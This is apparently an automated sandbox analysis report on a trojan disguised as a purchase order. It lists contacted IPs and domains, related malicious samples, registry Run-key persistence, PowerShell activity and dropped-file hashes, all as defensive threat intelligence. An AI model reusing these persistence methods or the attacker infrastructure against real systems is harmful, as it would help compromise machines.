                                    • URL Reputation: safe
                                    unknown
                                    https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://www.liverpool.com/all-about/steven-gerrard08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-1995461608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-1717139108042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://schema.org/NewsArticle08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                      high
                                      https://www.liverpool.com/schedule/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schema.org/BreadcrumbList08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                        high
                                        https://securepubads.g.doubleclick.net/tag/js/gpt.js08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          high
                                          http://ocsp.sectigo.com008042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://s2-prod.liverpool.com/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-199619408042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-123135383708042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://felix.data.tm-awx.com/ampconfig.json&quot;08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-0208042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-1994608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-199383608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.150.212 | myliverpoolnews.cf | United States | 13335 | CLOUDFLARENETUS | false

Private

IP
192.168.2.1

                                            General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383917
Start date: 08.04.2021
Start time: 12:23:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 1s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winEXE@35/25@2/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 23.5% (good quality ratio 21.5%)
• Quality average: 78%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 23.54.113.53, 168.61.161.212, 52.147.198.201, 67.26.83.254, 8.241.82.126, 8.238.36.254, 8.241.78.126, 8.253.207.121, 104.43.193.48, 40.88.32.150, 52.255.188.83, 95.100.54.203, 20.82.209.183, 23.0.174.200, 23.0.174.185, 23.10.249.43, 23.10.249.26, 20.54.26.129, 20.50.102.62
                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383917/sample/08042021New-PurchaseOrder.exe

Simulations

Behavior and APIs

Time | Type | Description
12:24:32 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
12:24:36 | API Interceptor | 535x Sleep call for process: 08042021New-PurchaseOrder.exe modified
12:24:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SWqTT C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
12:24:52 | API Interceptor | 51x Sleep call for process: powershell.exe modified
12:24:57 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SWqTT C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe

                                            Joe Sandbox View / Context

IPs

Match: 172.67.150.212

Associated Sample Name / URL | Detection | Context
ETL_126_072_60.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC5277A9663FCE09586170F6A51B96A2.html
IMG_102-05_78_6.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C6853B6BC65431464628FF23B3F0F335.html
ACdEbpiSYO.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
Invoice_ord00000009.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8CB85A57C5722245E360D575B497E6CC.html
kayo.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-867E80DBC8FFAEC73AC7FD4FE1DA1A1B.html
new_order20210408_14.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
new_order20210408_14.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
DHLdocument11022020680908911.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E073BCECB8DFC74A5738D8B1C32D8436.html
234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8F0F96D3333F94679C552F5DEB9CE2AF.html
items list.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
Krishna Gangaa Enviro System Pvt Ltd.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-D1FD69143FEE625518220B28083FA2F9.html
SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09750D54320914EBBBA77235AE2BC46B.html
RFQ #46200058149.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FE6EFB3AED9F05224C930BEF8BE1CC20.html
Payment Slip E05060_47.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
New Orders.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-28D56F639751140E7A008217BE126C8D.html
DHL_document11022020680908911.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html
BL8846545545363.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B7B18D8B53846C51E3D2182818196100.html
BL84995005038483.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-994F3BB06F4A7FE8F60B83F74A076F10.html

Domains

Match: myliverpoolnews.cf

Associated Sample Name / URL | Detection | Context
ETL_126_072_60.doc | malicious | 172.67.150.212
IMG_102-05_78_6.doc | malicious | 172.67.150.212
lfQuSBwdSf.exe | malicious | 104.21.56.119
RFQ-034.exe | malicious | 104.21.56.119
ACdEbpiSYO.exe | malicious | 172.67.150.212
Invoice_ord00000009.exe | malicious | 172.67.150.212
kayo.exe | malicious | 172.67.150.212
new_order20210408_14.doc | malicious | 172.67.150.212
BL01345678053567.exe | malicious | 104.21.56.119
new_order20210408_14.doc | malicious | 172.67.150.212
DHLdocument11022020680908911.exe | malicious | 172.67.150.212
20200804-8293847pdf.scr.exe | malicious | 104.21.56.119
234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | malicious | 172.67.150.212
items list.doc | malicious | 172.67.150.212
SKMC25832100083932157.jar | malicious | 104.21.56.119
SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | malicious | 104.21.56.119
Krishna Gangaa Enviro System Pvt Ltd.exe | malicious | 172.67.150.212
PO75773937475895377.exe | malicious | 104.21.56.119
New Order.exe | malicious | 104.21.56.119
SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe | malicious | 172.67.150.212

ASN

Match: CLOUDFLARENETUS

Associated Sample Name / URL | Detection | Context
ETL_126_072_60.doc | malicious | 172.67.150.212
IMG_102-05_78_6.doc | malicious | 172.67.150.212
MT103_YIU LIAN08042021_Xerox Scan_202104_.exe | malicious | 172.67.188.154
PO4308.exe | malicious | 104.21.49.158
pumYguna1i.exe | malicious | 23.227.38.74
gqnTRCdv5u.exe | malicious | 104.21.65.7
Calt7BoW2a.exe | malicious | 104.21.48.10
0BAdCQQVtP.exe | malicious | 23.227.38.74
lfQuSBwdSf.exe | malicious | 172.67.188.154
TazxfJHRhq.exe | malicious | 23.227.38.74
AQJEKNHnWK.exe | malicious | 23.227.38.74
hvEop8Y70Y.exe | malicious | 172.67.219.254
RFQ-034.exe | malicious | 104.21.56.119
ACdEbpiSYO.exe | malicious | 172.67.150.212
PURCHASE ORDER - XIFFA55,pdf.exe | malicious | 172.67.188.154
Invoice_ord00000009.exe | malicious | 172.67.150.212
PRICE_QUOTATION_RFQ_000988_PDF.exe | malicious | 172.67.188.154
kayo.exe | malicious | 172.67.150.212
nicoleta.fagaras-DHL_TRACKING_1394942.html | malicious | 104.16.18.94
000OUTQ080519103.pdf.exe | malicious | 172.67.164.131

JA3 Fingerprints

Match: 54328bd36c14bd82ddaa0c04b25ed9ad

Associated Sample Name / URL | Detection | Context
MT103_YIU LIAN08042021_Xerox Scan_202104_.exe | malicious | 172.67.150.212
lfQuSBwdSf.exe | malicious | 172.67.150.212
RFQ-034.exe | malicious | 172.67.150.212
ACdEbpiSYO.exe | malicious | 172.67.150.212
PURCHASE ORDER - XIFFA55,pdf.exe | malicious | 172.67.150.212
Invoice_ord00000009.exe | malicious | 172.67.150.212
kayo.exe | malicious | 172.67.150.212
RFQ 100400806 SUPPLY.exe | malicious | 172.67.150.212
new_order20210408_14.doc | malicious | 172.67.150.212
BL01345678053567.exe | malicious | 172.67.150.212
SER09090899.exe | malicious | 172.67.150.212
PURCHASE ORDER-34002174,pdf.exe | malicious | 172.67.150.212
cricket.exe | malicious | 172.67.150.212
DHLdocument11022020680908911.exe | malicious | 172.67.150.212
20200804-8293847pdf.scr.exe | malicious | 172.67.150.212
234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | malicious | 172.67.150.212
SKMC25832100083932157.jar | malicious | 172.67.150.212
SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | malicious | 172.67.150.212
EMPRESA SUMPEX TRADE.exe | malicious | 172.67.150.212
Yeni siparis _WJO-001, pdf.exe | malicious | 172.67.150.212

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe

Associated Sample Name / URL | Detection
RFQ-034.exe | malicious
Payment Slip.exe | malicious
Revised Invoice No CU 7035.exe | malicious
Sales_Order description.exe | malicious
Outstanding invoices.exe | malicious
Q88_Bulk Carrier.exe | malicious
Payment _Slip copy.exe | malicious
MV. HUA KAI V-2023.exe | malicious
Order_April shipment.exe | malicious
INVOICE for Order PIEX310113978.exe | malicious
Krishna Gangaa Enviro System Pvt Ltd.exe | malicious
TT SWIFT COPY.exe | malicious
PO75773937475895377.exe | malicious
SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe | malicious
Download Report.06.05.2021.exe | malicious
Outstanding invoices.exe | malicious
IMG_767893434432.exe | malicious
VMtEguRH.exe | malicious
SHIPPING DOCS - MV. SN QUEEN.exe | malicious
MT CAPE AZALEA V219 PENAVICO 13-10-20.exe | malicious

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_08042021New-Purc_27713ebec8c220f2d5c09c5ea843cd62601d18_a44221a1_197a503e\Report.wer
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):17810
                                                                                    Entropy (8bit):3.76111653919658
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:JVWG2858mHBUZMXSaKQqueZiAr/u7sHS274ItrID:a859BUZMXSaFmD/u7sHX4ItrID
                                                                                    MD5:AF4E1C227B0751BF1A53848C9F03A9E6
                                                                                    SHA1:DC534378D22964114EEAAFAF7A386E17ED6956A2
                                                                                    SHA-256:A8579E2D19A25EA28420219C22800E67AC709339BBFAD9B4452F071C8D6245FB
                                                                                    SHA-512:E6E0347F43F7E4212DA8047A0691AC3517FBE69831A76EB2812401BBB134C3BA563BD0665C384378B36AC6EDF86C7151C05CEBD40BAE5E67A1F48CD32C196AB4
                                                                                    Malicious:false
Preview (UTF-16LE decoded, one field per line in the file): Version=1 | EventType=CLR20r3 | EventTime=132623834666506814 | ReportType=2 | Consent=1 | UploadTime=132623834708381688 | ReportStatus=268566528 | ReportIdentifier=a20a58b3-29a2-4f9b-8938-158b847815fc | IntegratorReportIdentifier=b1a92e4f-e709-4795-ad98-d79837b9f193 | Wow64Host=34404 | Wow64Guest=332 | NsAppName=08042021New-PurchaseOrder.exe | OriginalFilename=Dimbono.exe | AppSessionGuid=00001358-0001-0017-7b97-10b3ac2cd701 | TargetAppId=W:000644905294daf239dd6142d109e1cd01fb00000000!00000ef424d2000f18e6b83 (truncated)
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A64.tmp.dmp
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Thu Apr 8 19:24:28 2021, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):216131
                                                                                    Entropy (8bit):4.277177437167617
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:K9gIOgF5D0IUCgU/OMonDD0Jjd+pLnLqmIQ8AC:K9RpDDLTj1+n0+pbQ
                                                                                    MD5:76DAA92CA9E2F639D4A568D2A4D70E64
                                                                                    SHA1:94D20601C7B055218717B090681CF098B84CB54B
                                                                                    SHA-256:2D78C048DC77E027A8F20DBCA16AA6D7EFAB2839F61CE8184A7B57DFFBCF8926
                                                                                    SHA-512:8C6F28A50D4E07A10B0D0739D82CEA7DD0D6A51A715D2593BD0856980A9C41E71DD889225AD17238CAF35766EB62B8516298ACFE40781B802A1F1A7800E636A3
                                                                                    Malicious:false
                                                                                    Preview: MDMP....... .......lXo`...................U...........B......t2......GenuineIntelW...........T.......X...DXo`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER48CD.tmp.WERInternalMetadata.xml
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8464
                                                                                    Entropy (8bit):3.691990666806616
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Rrl7r3GLNi1wx6a4N6YSCSUB6r9BagmfZGSJCpr589bqnosf0lTum:RrlsNi1O636YXSUB6qgmfESHqnbfg
                                                                                    MD5:2EE7D828681FD55EEB4F8891CD796B2A
                                                                                    SHA1:EFD9CE3F378CDC328073951F1ECB3991E236BBE2
                                                                                    SHA-256:CE5351E5E76808C0B7092BDAEB352E9580361AD4105E0FBD159CF88356D2B910
                                                                                    SHA-512:D8ABBCFEDE9CC145CA3F79ED1D873BF39720D004D9CCBFE7AE062E7E9B67DF0F7F924929AE96E3BF6F2A3DB6798131BC1059520700A63592FB0403D079EDBC12
                                                                                    Malicious:false
Preview (UTF-16LE decoded): <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4952</Pid> (truncated)
                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A06.tmp.xml
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4825
                                                                                    Entropy (8bit):4.497489010071743
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9e4WSC8BY8fm8M4JyFFJT+q8vjTnEM6b3/5dd:uITfk1xSNHJEKfnEM6D5dd
                                                                                    MD5:2AB29E9A09B790218331EC3C4CEE857A
                                                                                    SHA1:9CAA69CF504EBEE2B77AA77B68EAA3C6E6104103
                                                                                    SHA-256:6CCEC29B8813A4EE4751818F0C609B4B964995A8C96F7D908D2A5DFAC9E15E06
                                                                                    SHA-512:7C2067CCE77DE292366EBD378F09C46769A5BFF6211177D6FE3403FCB899DA1CBD03216EBF04AADAD73108951FBEAE097C8B850576D68ACD13279F01BF5EBD85
                                                                                    Malicious:false
                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937715" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                    Category:dropped
                                                                                    Size (bytes):58596
                                                                                    Entropy (8bit):7.995478615012125
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                    Malicious:false
                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):326
                                                                                    Entropy (8bit):3.1192967794857243
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKjkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:IwTJrkPlE99SNxAhUe0ht
                                                                                    MD5:867208FDC0011BB0AAD04D0F71742310
                                                                                    SHA1:0F84E3ADACBAFE22A60258CBD0E55F52D0182F52
                                                                                    SHA-256:D3126C132F43D87523FD33D729EC3885ACD6AD5557D9056E447EBB0FE3F44B66
                                                                                    SHA-512:E5F073C2625506540A70A1827CA6E49392071717A7D9B6E645E7CB85C545BECC0279E33DE26205DF953C4999AEC645199FDA5B6F5A05582C7863FFF88271ED7F
                                                                                    Malicious:false
Preview (binary cache header followed by UTF-16LE text): http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "0d8f4f3f6fd71:0" (this URL is CryptoAPI's automatic root certificate trust list download, a side effect of certificate chain validation inside the sample's process rather than attacker infrastructure)
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):14734
                                                                                    Entropy (8bit):4.993014478972177
                                                                                    Encrypted:false
